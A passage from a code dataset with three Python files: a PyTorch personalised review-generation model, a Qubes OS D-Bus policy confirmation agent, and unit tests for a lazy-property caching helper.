user_output = self.m_user_decoder(reviews, user_hidden)\n item_output = self.m_item_decoder(reviews, item_hidden)\n\n user_logits = self.m_output2vocab(user_output.view(-1, user_output.size(2)))\n item_logits = self.m_output2vocab(item_output.view(-1, item_output.size(2)))\n\n return user_logits, item_logits\n\n def update_user_item(self, reviews, review_lens, user_ids, item_ids):\n \n user_hidden = self.m_user_encoder(reviews, review_lens)\n user_one_hot = F.one_hot(user_ids, self.m_user_size).type(user_hidden.dtype)\n user_embedding_sum = user_one_hot.transpose(0, 1) @ user_hidden\n\n self.m_user_embedding.weight.data.add_(user_embedding_sum)\n\n self.m_user_cnt.add_(torch.sum(user_one_hot, dim=0).unsqueeze(1))\n\n item_hidden = self.m_item_encoder(reviews, review_lens)\n item_one_hot = F.one_hot(item_ids, self.m_item_size).type(item_hidden.dtype)\n item_embedding_sum = item_one_hot.transpose(0, 1) @ item_hidden\n\n self.m_item_embedding.weight.data.add_(item_embedding_sum)\n\n self.m_item_cnt.add_(torch.sum(item_one_hot, dim=0).unsqueeze(1))\n\n def normalize_user_item(self):\n self.m_user_embedding.weight.data.div_(self.m_user_cnt)\n self.m_item_embedding.weight.data.div_(self.m_item_cnt)\n # self.m_item_embedding.weight.data = self.m_item_embedding.weight.data/self.m_item_cnt\n\n if (self.m_user_cnt != 0).sum() != self.m_user_size:\n print(\"user num\", (self.m_user_cnt == 0).sum())\n print(\"user num\", self.m_user_size)\n for i, _ in enumerate(self.m_user_cnt):\n if self.m_user_cnt[i, 0] == 0:\n print(\"user cnt zeros\", self.m_user_cnt[i, 0])\n\n if torch.isinf(self.m_user_embedding.weight).any():\n print(\"normalize user_embedding inf\", self.m_user_embedding.weight)\n \n if torch.isinf(self.m_item_embedding.weight).any():\n print(\"normalize item_embedding inf\", self.m_item_embedding.weight)\n\n self.m_user_embedding.weight.requires_grad=False\n self.m_item_embedding.weight.requires_grad=False\n self.m_embedding.weight.requires_grad=False\n self.m_output2vocab.weight.requires_grad=False\n\nclass _ENCODER(nn.Module):\n def __init__(self, embedding, latent_size, hidden_size, layers_num=1, dropout=0.3):\n super(_ENCODER, self).__init__()\n \n self.m_dropout_rate = dropout\n # self.m_device = device\n\n self.m_embedding = embedding\n self.m_embedding_dropout = nn.Dropout(self.m_dropout_rate)\n\n self.m_latent_size = latent_size\n self.m_hidden_size = hidden_size\n self.m_layers_num = layers_num\n\n self.m_gru = nn.GRU(self.m_hidden_size, self.m_hidden_size, self.m_layers_num, dropout=self.m_dropout_rate, bidirectional=True)\n \n self.m_hidden2latent = nn.Linear(self.m_hidden_size*2, self.m_latent_size)\n \n # self = self.to(self.m_device)\n\n def forward(self, x, x_len, hidden=None):\n # if not hasattr(self, '_flattened'):\n # self.m_gru.flatten_parameters()\n # setattr(self, '_flattened', True)\n\n batch_size = x.size(0)\n input_embedding = self.m_embedding(x)\n input_embedding = self.m_embedding_dropout(input_embedding)\n\n encoder_outputs, _ = self.m_gru(input_embedding)\n\n # first_dim_index = torch.arange(batch_size).to(self.m_device)\n first_dim_index = torch.arange(batch_size).to(input_embedding.device)\n second_dim_index = (x_len-1).long()\n\n last_en_hidden = encoder_outputs[first_dim_index, second_dim_index, :].contiguous()\n\n en_latent = self.m_hidden2latent(last_en_hidden)\n\n return en_latent\n\nclass _DECODER(nn.Module):\n def __init__(self, embedding, embedding_size, latent_size, hidden_size, layers_num=1, dropout=0.3):\n super(_DECODER, self).__init__()\n # self.m_device = device\n\n self.m_latent_size = latent_size\n self.m_dropout_rate = dropout\n self.m_embedding_size = embedding_size\n \n self.m_tanh = nn.Tanh()\n self.m_latent2output = nn.Linear(self.m_latent_size, self.m_embedding_size)\n\n self.m_embedding = embedding\n self.m_embedding_dropout = nn.Dropout(self.m_dropout_rate)\n\n self.m_hidden_size = hidden_size\n self.m_layers_num = layers_num\n \n self.m_gru = nn.GRU(self.m_hidden_size, self.m_hidden_size, self.m_layers_num, dropout=self.m_dropout_rate, bidirectional=False)\n\n # self = self.to(self.m_device)\n\n def forward(self, x, en_latent, hidden=None):\n # if not hasattr(self, '_flattened'):\n # self.m_gru.flatten_parameters()\n # setattr(self, '_flattened', True)\n\n en_hidden = self.m_tanh(en_latent)\n de_hidden = self.m_latent2output(en_hidden)\n\n batch_size = x.size(0)\n input_embedding = self.m_embedding(x)\n input_embedding = self.m_embedding_dropout(input_embedding)\n\n de_hidden = de_hidden.unsqueeze(1)\n de_hidden = de_hidden.expand(de_hidden.size(0), input_embedding.size(1), de_hidden.size(-1))\n\n output_embedding = input_embedding + de_hidden\n\n output, hidden = self.m_gru(output_embedding)\n output = output.contiguous()\n\n return output\n\nclass _GEN_NETWORK(nn.Module):\n def __init__(self, vocab_obj, args):\n super().__init__()\n\n # self.m_device = device\n\n self.m_hidden_size = args.hidden_size\n self.m_latent_size = args.latent_size\n \n self.m_max_sequence_len = args.max_seq_length\n self.m_layers_num = args.layers_num\n self.m_bidirectional = args.bidirectional\n self.m_embedding_size = args.embedding_size\n self.m_aspect_num = args.aspect_num\n\n self.m_sos_idx = vocab_obj.sos_idx\n self.m_eos_idx = vocab_obj.eos_idx\n self.m_pad_idx = vocab_obj.pad_idx\n self.m_unk_idx = vocab_obj.unk_idx\n self.m_vocab_size = vocab_obj.vocab_size\n self.m_user_num = vocab_obj.user_size\n self.m_item_num = vocab_obj.item_size\n\n self.m_embedding = nn.Embedding(self.m_vocab_size, self.m_embedding_size)\n self.m_user_embedding = nn.Embedding(self.m_user_num, self.m_latent_size)\n self.m_item_embedding = nn.Embedding(self.m_item_num, self.m_latent_size)\n\n self.m_aspect_embedding = nn.Linear(self.m_embedding_size, self.m_aspect_num, bias=False)\n\n self.m_tanh = nn.Tanh()\n self.m_latent2output = nn.Linear(self.m_latent_size, self.m_embedding_size)\n\n self.m_de_strategy = args.de_strategy\n\n self.m_decoder_rnn = nn.GRU(self.m_embedding_size, self.m_hidden_size, num_layers=self.m_layers_num, bidirectional=False, batch_first=True)\n\n self.m_gating_network = nn.Sequential(nn.Linear(self.m_hidden_size, self.m_embedding_size), nn.Tanh(), nn.Linear(self.m_embedding_size, 2))\n \n self.m_user_aspect = nn.Linear(self.m_latent_size, self.m_embedding_size, bias=False)\n self.m_item_aspect = nn.Linear(self.m_latent_size, self.m_embedding_size, bias=False)\n \n self.m_output2vocab = nn.Linear(self.m_hidden_size, self.m_vocab_size)\n\n if self.m_de_strategy == \"attn\":\n self.m_attn = nn.Sequential(nn.Linear(self.m_hidden_size+self.m_latent_size, self.m_hidden_size), nn.Tanh(), nn.Linear(self.m_hidden_size, 1)) \n\n # self = self.to(self.m_device)\n \n def f_init_user_item_word(self, E_network):\n E_network.eval()\n\n self.m_embedding.weight.requires_grad=False\n self.m_user_embedding.weight.requires_grad=False\n self.m_item_embedding.weight.requires_grad=False\n self.m_output2vocab.weight.requires_grad=False\n\n self.m_embedding.weight.data.copy_(E_network.m_embedding.weight.data)\n\n self.m_user_embedding.weight.data.copy_(E_network.m_user_embedding.weight.data)\n \n self.m_item_embedding.weight.data.copy_(E_network.m_item_embedding.weight.data)\n \n self.m_output2vocab.weight.data.copy_(E_network.m_output2vocab.weight.data)\n \n def f_gumbel_softmax(self, logits, eps=1e-20, temp=1e-3):\n shape = logits.size()\n U = torch.rand(shape)\n gumbel_sample = -torch.log(-torch.log(U+eps)+eps).to(logits.device)\n y = logits + gumbel_sample\n \n return F.softmax(y/temp, dim=-1)\n\n def forward(self, input_de_sequence, user_ids, item_ids, random_flag):\n\n batch_size = input_de_sequence.size(0)\n de_batch_size = input_de_sequence.size(0)\n de_len = input_de_sequence.size(1)\n\n input_de_embedding = self.m_embedding(input_de_sequence)\n\n input_user_hidden = self.m_user_embedding(user_ids)\n input_item_hidden = self.m_item_embedding(item_ids)\n\n ### m_aspect_word_embedding: voc_size*aspect_size\n self.m_aspect_word_embedding = F.softmax(self.m_aspect_embedding(self.m_embedding.weight), dim=0)\n\n ### m_aspect_word_embedding: aspect_size*voc_size\n self.m_aspect_word_embedding = self.m_aspect_word_embedding.transpose(0, 1)\n\n ### aspect_prop: batch_size*aspect_size\n aspect_prop = self.m_aspect_embedding(self.m_user_aspect(input_user_hidden)+self.m_item_aspect(input_item_hidden))\n\n # print(\"aspect_prop\", aspect_prop.size())\n # print(\"aspect_prop device\", aspect_prop.device)\n # print(\"self.m_aspect_word_embedding device\", self.m_aspect_word_embedding.device)\n # print(\"m_aspect_word_embedding\", self.m_aspect_word_embedding.size())\n ### aspect_word_prob: batch_size*voc_size\n # aspect_word_prob = F.softmax(aspect_prop @ self.m_aspect_word_embedding, dim=-1)\n aspect_word_prob = aspect_prop @ self.m_aspect_word_embedding\n if torch.isnan(aspect_word_prob).any():\n print(\"aspect_word_prob\", aspect_word_prob)\n exit()\n\n output = []\n # user_item_hidden_i = self.m_latent2output(user_item_hidden_init)\n\n hidden = None\n decode_strategy = self.m_de_strategy\n\n if decode_strategy == \"attn\":\n \"\"\"\n attention mechanism output\n \"\"\"\n\n for de_step_i in range(de_len):\n input_de_step_i = input_de_embedding[:, de_step_i, :]\n # input_de_step_i = input_de_step_i + user_item_hidden_i\n input_de_step_i = input_de_step_i.unsqueeze(1)\n \n output_step_i, hidden = self.m_decoder_rnn(input_de_step_i, hidden)\n \n ### output_step_i: batch_size*hidden_size\n output_step_i = output_step_i.squeeze(1)\n\n ### word_prob: batch_size*voc_size\n # word_prob_i = F.softmax(self.m_output2vocab(output_step_i), dim=-1)\n word_prob_i = self.m_output2vocab(output_step_i)\n if torch.isnan(word_prob_i).any():\n print(\"word_prob_i\", word_prob_i)\n exit()\n \n ### gate: batch_size*2\n gate_i = self.m_gating_network(output_step_i)\n\n gate_i = self.f_gumbel_softmax(gate_i) \n\n # gate_i = F.softmax(gate_i)\n\n ### gate_aspect_word_prob: batch_size*voc_size\n gate_aspect_word_prob_i = gate_i[:, 0].unsqueeze(1)*aspect_word_prob\n\n ### gate_word_prob: batch_size*voc_size\n gate_word_prob_i = gate_i[:, 1].unsqueeze(1)*word_prob_i\n\n output_prob_i = gate_aspect_word_prob_i + gate_word_prob_i\n\n output.append(output_prob_i.unsqueeze(1))\n\n output = torch.cat(output, dim=1)\n\n output = output.contiguous()\n \n if torch.isnan(output).any():\n print(\"output\", output)\n exit()\n\n return output\n\n### obtain the representation of users and items. \n\n","repo_name":"RenqinCai/PersonalizedReviewCopy","sub_path":"EMKRefSeq/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"22009189557","text":"import pydbus\n# pylint: disable=import-error,wrong-import-position\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import GLib\n# pylint: enable=import-error\n\nimport qubespolicy.rpcconfirmation\nimport qubespolicy.policycreateconfirmation\n# pylint: enable=wrong-import-position\n\nclass PolicyAgent(object):\n # pylint: disable=too-few-public-methods\n dbus = \"\"\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \"\"\"\n\n @staticmethod\n def Ask(source, service_name, targets, default_target,\n icons):\n # pylint: disable=invalid-name\n entries_info = {}\n for entry in icons:\n entries_info[entry] = {}\n entries_info[entry]['icon'] = icons.get(entry, None)\n\n response = qubespolicy.rpcconfirmation.confirm_rpc(\n entries_info, source, service_name,\n targets, default_target or None)\n return response or ''\n\n @staticmethod\n def ConfirmPolicyCreate(source, service_name):\n # pylint: disable=invalid-name\n\n response = qubespolicy.policycreateconfirmation.confirm(\n source, service_name)\n return response\n\ndef main():\n loop = GLib.MainLoop()\n bus = pydbus.SystemBus()\n obj = PolicyAgent()\n bus.publish('org.qubesos.PolicyAgent', obj)\n loop.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"iamforprog/All_respository","sub_path":"qubespolicy/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"69933415966","text":"from unittest import TestCase\n\nfrom tensor_dynamic.lazyprop import lazyprop, clear_all_lazyprops, subscribe_to_lazy_prop, unsubscribe_from_lazy_prop, \\\n clear_lazyprop_on_lazyprop_cleared, clear_lazyprop\n\n\nclass _PropClass(object):\n STATIC_VAL = None\n\n @lazyprop\n def lazyprop(self):\n return self.STATIC_VAL\n\n\nclass TestLazyprop(TestCase):\n def test_clear_all(self):\n prop_class = _PropClass()\n prop_class.STATIC_VAL = 1\n self.assertEquals(prop_class.lazyprop, 1)\n\n prop_class.STATIC_VAL = 2\n self.assertEquals(prop_class.lazyprop, 1)\n\n clear_all_lazyprops(prop_class)\n self.assertEquals(prop_class.lazyprop, 2)\n\n def test_subscribe_lazy_prop_change(self):\n prop_class = _PropClass()\n checker = []\n subscribe_to_lazy_prop(prop_class, 'lazyprop',\n lambda _: checker.append(1))\n\n clear_all_lazyprops(prop_class)\n\n self.assertEqual(checker, [1])\n\n def test_unsubscribe_lazy_prop_change(self):\n prop_class = _PropClass()\n checker = []\n func = lambda _: checker.append(1)\n subscribe_to_lazy_prop(prop_class, 'lazyprop', func)\n\n clear_all_lazyprops(prop_class)\n\n self.assertEqual(len(checker), 1)\n\n unsubscribe_from_lazy_prop(prop_class, 'lazyprop', func)\n\n clear_all_lazyprops(prop_class)\n\n self.assertEqual(len(checker), 1)\n\n def test_clear_lazyprop_on_lazyprop_cleared(self):\n prop_class_1 = _PropClass()\n prop_class_2 = _PropClass()\n\n clear_lazyprop_on_lazyprop_cleared(prop_class_2, 'lazyprop',\n prop_class_1, 'lazyprop')\n\n prop_class_1.STATIC_VAL = 1\n prop_class_2.STATIC_VAL = 2\n\n self.assertEqual(prop_class_1.lazyprop, 1)\n self.assertEqual(prop_class_2.lazyprop, 2)\n\n prop_class_1.STATIC_VAL = 3\n prop_class_2.STATIC_VAL = 4\n\n clear_lazyprop(prop_class_1, 'lazyprop')\n\n self.assertEqual(prop_class_1.lazyprop, 3)\n self.assertEqual(prop_class_2.lazyprop, 4)","repo_name":"DanielSlater/tensordynamic","sub_path":"tests/test_lazyprop.py","file_name":"test_lazyprop.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"86"}